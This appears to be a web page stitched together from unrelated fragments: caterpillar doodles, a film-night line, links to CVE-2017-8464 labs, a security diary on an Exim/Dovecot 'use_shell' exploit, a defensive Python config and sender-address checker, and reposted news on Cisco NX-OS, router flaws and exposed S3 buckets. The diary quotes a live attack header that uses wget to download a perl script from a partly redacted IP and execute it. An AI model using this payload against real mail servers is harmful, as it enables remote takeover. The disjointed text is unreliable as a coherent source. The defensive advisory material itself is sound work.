Grub Right Grub Right
The doodles under the cut include an image of an actual caterpillar, just in case those make anyone uncomfortable




Jess Franco Friday!
labs - Vulnerability Labs for security analysis
https://github.com/nixawk/labs/blob/master/CVE-2017-8464/wp-cpl-malware.pdf
https://github.com/nixawk/labs/blob/master/CVE-2017-8464/%5BMS-SHLLINK%5D-160714.pdf
https://twitter.com/FredericJacobs/status/455365268240228353/photo/1/large
by Joel Esler (Version: 1)
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this:
From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@example.com
(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make sure they aren't using the "use_shell" parameter. Or if you are, make darn sure you know what you are doing, and how to defend yourself.
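The configuration check recommended above can be scripted. The following is an added example, not code from the diary or from Dovecot or Exim: it assumes the delivery command is defined in an Exim-style transports section where a boolean is written as `use_shell`, `no_use_shell`/`not_use_shell` or `use_shell = true|false`, and the sample config, transport names and paths are constructed. It also flags envelope senders carrying shell syntax like the one quoted above.

```python
import re

# Constructed Exim-style config for illustration; names and paths are assumptions.
SAMPLE_CONFIG = """\
begin routers
# use_shell   (comment, must be ignored)

begin transports
dovecot_delivery:
  driver = pipe
  command = /usr/local/libexec/example-deliver -f "$sender_address"
  use_shell
local_filter:
  driver = pipe
  command = /usr/local/bin/example-filter
  no_use_shell
archive_pipe:
  driver = pipe
  use_shell = false

begin retry
"""

SECTION = re.compile(r"^begin\s+(\w+)$", re.I)
INSTANCE = re.compile(r"^(\w+):$")
USE_SHELL = re.compile(r"^(no_|not_)?use_shell(?:\s*=\s*(\w+))?$")
# Heuristic: shell syntax that has no business in an envelope sender.
SHELL_SYNTAX = re.compile(r"`|\$\{|\$\(|[|;]")

def transports_using_shell(config_text):
    """Return transport names whose use_shell option ends up enabled."""
    state, section, current = {}, None, None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if m := SECTION.match(line):
            section, current = m.group(1).lower(), None
        elif section == "transports" and (m := INSTANCE.match(line)):
            current = m.group(1)
            state[current] = False
        elif current and (m := USE_SHELL.match(line)):
            negated, value = m.groups()
            # The last setting in a transport wins; a bare option means true.
            state[current] = not negated and (value or "true").lower() in ("true", "yes")
    return sorted(name for name, on in state.items() if on)

def sender_has_shell_syntax(address):
    """True if an envelope sender contains backticks, ${...}, $(...), | or ;."""
    return bool(SHELL_SYNTAX.search(address))
```

Any transport name returned by `transports_using_shell` is one where the sender address reaches a shell and should be reviewed; the sender check is a heuristic suited to log triage, not a replacement for removing the option.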
The network hardware specialist Cisco has issued a security advisory that documents a number of security vulnerabilities in Cisco NX-OS, which should be fixed by updates. Cisco NX-OS is an operating system for network components optimised for high availability. Among the affected devices are the Nexus range of data centre switches, the Cisco 6100/6200 switches in Cisco's Unified Computing server fabric, the MDS 9000 series of multilayer switches for storage area networks, and the Cisco 1000 series connected grid router, designed for use in energy, gas and water supply.
;;; probably just an ad for this organization since there is scant details in this piece and I can’t be assed to dig deeper, but here you go:
=-=-=+
IDG News Service - Thirteen popular home and small office routers contain security problems that could allow a hacker to snoop or modify network traffic, according to new research. Independent Security Evaluators (ISE), a security consultancy based in Baltimore, found that all of the routers they tested could be taken over if the hacker had access credentials. The tested products came from Linksys, Belkin, Netgear, Verizon and D-Link. All of the router models evaluated ran their company’s latest firmware and were tested with their default, out-of-the-box configurations. Consumers have few options for mitigating the attacks, ISE said in its report. “Successful mitigation often requires a level of sophistication and skill beyond that of the average user,” ISE said.
+=-=-=
;;; still probably not nearly as bad as the last couple of pieces I posted about routers though. this is why running stock firmware is bad! bad bad bad.
With companies flocking to cloud services such as Amazon Simple Storage Service (S3) to store and serve static content on the cheap, naturally they’re making simple mistakes in doing so—and naturally, a savvy attacker is able to cash in.
Researchers at Rapid7 today released data from a project looking at the availability and security of files and other objects on Amazon S3. Businesses, generally small businesses, for example can store anything from backups to log files, static website images, and documents inside logical containers known as buckets. By default, the buckets are set to private, meaning that only certain users may list or download the objects stored in the bucket. Both the objects and the bucket can be password-protected. Public buckets, on the other hand, allow any user to view the contents. A company could also store private files inside a public bucket.
As it turns out, most users leave the default private setting. But Rapid7 security researcher Will Vandevanter, using information from HD Moore’s Critical.IO Project, the Bing Search API and a list of Fortune 1000 company names, found 12,328 buckets belonging to enterprises, and 1,951 of those had been reset to public, exposing more than 126 billion files.